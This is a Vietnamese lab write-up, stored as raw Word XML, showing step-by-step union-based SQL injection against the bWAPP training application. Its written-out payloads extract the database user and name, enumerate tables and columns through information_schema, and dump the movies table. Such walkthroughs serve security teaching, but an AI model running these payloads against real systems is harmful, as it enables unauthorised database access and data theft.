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B741E" w14:textId="75BC44B5" w:rsidR="00411158" w:rsidRPr="00833615" w:rsidRDefault="0083361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</w:t>
      </w:r>
      <w:r w:rsidR="00746710" w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SQL Injection (POST/SEARCH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4094A" w14:textId="47AA8E71" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giao diện bài lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A45904" w14:textId="0A96D65D" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008336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AA69E0" wp14:editId="4BB06AD5">
            <wp:extent cx="5943600" cy="3150235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1787267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671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C104" w14:textId="5F5F6838" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tương tự như các bài lab trước ta đã biết cách bypass qua sql syntax error thông qua 2 bài lab get/search và get/select. Vì vậy ở bài lab này chúng ta sẽ tiến hành khai thác sql injection luôn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE5BE0" w14:textId="77777777" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217" w:rsidP="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ lấy thông tin user và database name qua query  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86855C" w14:textId="12A89F46" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217" w:rsidP="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' and 1 = 0 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1,user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(),3,4,Database(),6,7 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong đó and 1=0 giúp trả về kết quả mà ta mong muốn bằng cách chuyển query trước đó thành false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E763D1" w14:textId="5CB6FB4E" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E309D1F" w14:textId="73036963" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083361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EEF58C" wp14:editId="403E9134">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="14748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1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C835" w14:textId="565DA5C0" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vậy ta biết được name của database là bWAPP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B138BED" w14:textId="1CC26EA5" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710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33615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta sẽ sử dụng sql query </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r w:rsidRPr="0083361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833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lấy</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008336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8336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table schema and names </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidRPr="008336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information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B65210" w14:textId="768A2D8B" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710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833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' and 1 = 0 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_schema,table_name,4,5,6,7 from information_schema.tables where 1=1-- '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6061F66B" w14:textId="78112EBE" w:rsidR="00746710" w:rsidRPr="00833615" w:rsidRDefault="00746710">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ở đây mình đặt điều kiện 1=1 để query có thể lấy toàn bộ bảng cho chúng ta </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43858A12" w14:textId="44690472" w:rsidR="00FC55E5" w:rsidRPr="00833615" w:rsidRDefault="00FC55E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083361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BDC6BF3" wp14:editId="1CB21492">
            <wp:extent cx="5943600" cy="4037330"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="868900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9004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586A" w14:textId="0EAF0F5E" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả hiện ra có khá nhiểu bảng, trong đó có nhiều bảng không cần thiết. vậy ta sẽ thu hẹp tìm kiếm lại ở database bWAPP với sql query sau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A08A4A" w14:textId="6E6E7D99" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217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833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' and 1=0 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_schema,table_name,4,table_rows,6,7 from information_schema.tables where table_schema = 'bwapp'-- '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F85C9" w14:textId="0BA56F08" w:rsidR="003E4217" w:rsidRPr="00833615" w:rsidRDefault="003E4217">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083361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4A14AD7" wp14:editId="3BAE9AC2">
            <wp:extent cx="5943600" cy="4029075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1359715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158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9C9D" w14:textId="3C27C58E" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kết quả trả về tên các bảng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913FCC8" w14:textId="0AD3AB04" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ta sẽ thử trích xuất các cột trong bảng movies bằng query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E7500" w14:textId="5551BFFC" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A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833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' and 1=0 union all select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_name,3,4,5,6,7 from information_schema.columns where table_name = 'movies' and table_schema = 'bwapp'-- '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C7460" w14:textId="7B4E0015" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083361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A660F0D" wp14:editId="56A4DE83">
            <wp:extent cx="5943600" cy="3956050"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="980710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104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60A4" w14:textId="2F97C843" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ở đây mình </w:t>
      </w:r>
      <w:r w:rsidR="00833615" w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">muốn khai thác 2 mục id và tickets_stock từ movies nên mình sẽ sử dụng query sau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C607E0" w14:textId="5BBCCD85" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A" w:rsidP="006F441A">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' and 1=0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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 xml:space="preserve">union </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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 xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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select 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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,(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615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select GROUP_CONCAT(</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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,":",</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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tickets_stock</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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 xml:space="preserve">,"\n") from </w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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movies</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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),</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00833615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,6,7</w:t>
      </w:r>
      <w:r w:rsidR="00833615" w:rsidRPr="00833615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-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E05914" w14:textId="0DCC01D6" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="006F441A" w:rsidP="006F441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33615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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="666F22AA" wp14:editId="4298D2A1">
            <wp:extent cx="5943600" cy="4096385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1933041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412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D1EB" w14:textId="6EB0FD13" w:rsidR="006F441A" w:rsidRPr="00833615" w:rsidRDefault="00833615">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả trả về id và ticket_stock dưới dạng   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833615">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id:stock</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00833615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6F441A" w:rsidRPr="008336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710"/>
    <w:rsid w:val="003E4217"/>
    <w:rsid w:val="00411158"/>
    <w:rsid w:val="006F441A"/>
    <w:rsid w:val="00746710"/>
    <w:rsid w:val="00833615"/>
    <w:rsid w:val="00FC5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41BA4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2FE914FA-1080-4DBC-BF45-799E10C07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42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6</Pages>
  <Words>233</Words>
  <Characters>1333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Anh Lưu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Quốc Anh Lưu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-23T06:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-23T08:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>